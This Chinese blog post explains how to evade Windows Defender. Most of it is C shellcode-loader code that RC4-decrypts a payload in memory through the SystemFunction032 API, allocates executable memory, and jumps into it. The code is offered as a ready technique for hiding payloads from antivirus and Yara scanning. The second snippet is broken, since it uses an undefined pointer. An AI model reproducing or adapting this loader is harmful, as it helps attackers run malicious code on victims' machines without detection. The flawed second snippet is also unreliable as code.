一个免杀Windows defender的小技巧

  • laoxinsec

    2023-04-29 15:18:58
  • 数据库开发技术
  • 原创

目前很多免杀做法都是采用XOR加密的方式,很XOR容易被发现,不管你XOR的key有多长,而且像Yara这种都是支持XOR逻辑检测的。所以采用其他的方式加密payload/内存会更好,这里推荐一个WindowsAPI SystemFunction032,调用方法很简单,只需要传递2个参数:需要加密/解密的内存和Key值即可: 

 NTSTATUS SystemFunction032 (  struct ustring*       data,  const struct ustring* key)

exploit:

#include #include 

unsigned char shellcode[] = "\xec\x54\x11\x1e...."typedef NTSTATUS(WINAPI* pSystemFunction032)(PVOID, PVOID);
void main() {    // encryption Key     unsigned char keyBuf[16] = { 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x' };
    // RC4 struct    typedef struct _USTRING {        DWORD Length;        DWORD MaximumLength;        PVOID  Buffer;    } USTRING, * PUSTRING;
    USTRING keyString;    keyString.Buffer = keyBuf;    keyString.Length = 16;    keyString.MaximumLength = 16;
    USTRING imgString;
    int size = sizeof(shellcode);
    DWORD tProcess = GetCurrentProcessId();    printf("Current Process ID: %d\n", tProcess);    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess);    printf("Process Handle: %d\n", pHandle);    LPVOID rPtr = VirtualAllocEx(        pHandle,        NULL,        size,        MEM_COMMIT,       PAGE_EXECUTE_READWRITE    );
    WriteProcessMemory(pHandle, rPtr, shellcode, size, NULL);
      imgString.Buffer = rPtr;    imgString.Length = size;    imgString.MaximumLength = size;
    // Call SystemFunction032    HMODULE hModule = LoadLibraryA("Advapi32.dll");    pSystemFunction032 SystemFunction032 = (pSystemFunction032)GetProcAddress(hModule, "SystemFunction032");    SystemFunction032(&imgString, &keyString);
    ((void(*)())rPtr)();

}

可以将payload包含在.text节中,该节通常默认具有RX权限,这样避免了更改内存权限,将 payload写入内存这些动作

#pragma section(".text")unsigned char shellcode[] = "\xec\x54\x11\x1e...."  // encryption Key     unsigned char keyBuf[16] = { 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x', 'x' };
    // RC4 struct    typedef struct _USTRING {        DWORD Length;        DWORD MaximumLength;        PVOID  Buffer;    } USTRING, * PUSTRING;
    USTRING keyString;    keyString.Buffer = keyBuf;    keyString.Length = 16;    keyString.MaximumLength = 16;
    USTRING imgString;
    int size = sizeof(shellcode);    imgString.Buffer = rPtr;    imgString.Length = size;    imgString.MaximumLength = size;
    // Call SystemFunction032    HMODULE hModule = LoadLibraryA("Advapi32.dll");    pSystemFunction032 SystemFunction032 = (pSystemFunction032)GetProcAddress(hModule, "SystemFunction032");    SystemFunction032(&imgString, &keyString);
    ((void(*)())rPtr)();

效果:

感谢阅读

请使用浏览器的分享功能分享到微信等